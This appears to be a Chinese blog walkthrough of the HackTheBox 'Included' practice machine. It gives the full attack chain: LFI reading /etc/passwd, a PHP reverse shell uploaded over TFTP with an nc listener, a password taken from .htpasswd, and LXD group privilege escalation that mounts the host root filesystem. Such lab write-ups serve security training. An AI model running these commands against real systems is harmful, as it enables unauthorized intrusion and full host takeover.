hackthebox-Included靶机wp

2024-03-07 1,059 0

渗透阶段

老规矩,挂vpn开机用nmap扫描

sudo nmap -sC -sV 10.129.95.185
-sC #使用默认脚本
-sV	#探测服务版本信息

hackthebox-Included靶机wp插图

80端口开着,再看第一个问题,再扫一下udp端口

sudo nmap -sU 10.129.95.185
-sU #扫描udp

hackthebox-Included靶机wp插图1

看扫描结果,第一题的答案是tftp

浏览器访问80端口,看样子是用到本地文件包含漏洞,第二题答案是Local File Inclusion

hackthebox-Included靶机wp插图2

试一下读/etc/passwd,成功读到

hackthebox-Included靶机wp插图3

第三题问题:TFTP 用于存储文件的默认系统文件夹是什么?

直接google,第三题的答案是/var/lib/tftpboot/

tftp默认是不需要身份验证的,可以直接利用tftp来上传一个shell,然后用文件包含漏洞来读取,这样就可以得到一个可以利用的shell

这里用的shell是这个项目:https://github.com/pentestmonkey/php-reverse-shell

修改文件中ip地址和端口为反弹的地址
hackthebox-Included靶机wp插图4

连接tftp,上传shell

hackthebox-Included靶机wp插图5

监听端口

nc -lvnp 1234

这里用目录穿越方式访问shell
hackthebox-Included靶机wp插图6

shell成功反弹
hackthebox-Included靶机wp插图7

运行命令获得交互式shell

script /dev/null -c bash

hackthebox-Included靶机wp插图8

在/var/www/html路径下的.htpasswd得到mike的密码

hackthebox-Included靶机wp插图9

第四题答案.htpasswd

切换到mike账号

su mike

hackthebox-Included靶机wp插图10

得到user的flag

权限提升

查看mike权限,发现在lxd群组里,第五题答案是lxd

hackthebox-Included靶机wp插图11

搜索lxd组用户的提权手段,本篇参考https://blog.csdn.net/YouthBelief/article/details/123548739

把alpine镜像git clone到本地,第六题答案就是alpine

git clone https://github.com/saghul/lxd-alpine-builder.git

执行build-alpine命令构建alpine镜像,需要root用户完成

cd lxd-alpine-builder
sudo ./build-alpine

hackthebox-Included靶机wp插图12

构建完成后需要将tar文件发送至目标设备

python3 -m http.server 80

在shell中下载攻击机的alpine-v3.19-x86_64-20240212_1405.tar.gz文件,下载路径为/home/mike

wget http://你的ip/alpine-v3.19-x86_64-20240212_1405.tar.gz

hackthebox-Included靶机wp插图13

导入镜像并初始化镜像

lxc image import ./alpine-v3.19-x86_64-20240212_1405.tar.gz --alias test
lxc init test test -c security.privileged=true

第七题答案就是security.privileged=true

hackthebox-Included靶机wp插图14

挂载磁盘

lxc config device add test test disk source=/ path=/mnt/root recursive=true

第八题答案/mnt/root/

hackthebox-Included靶机wp插图15

启动镜像并进入镜像访问root文件

lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls
cd /root
cat proof.txt
cat root.txt

hackthebox-Included靶机wp插图16

最后提交两个flag通关靶机


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论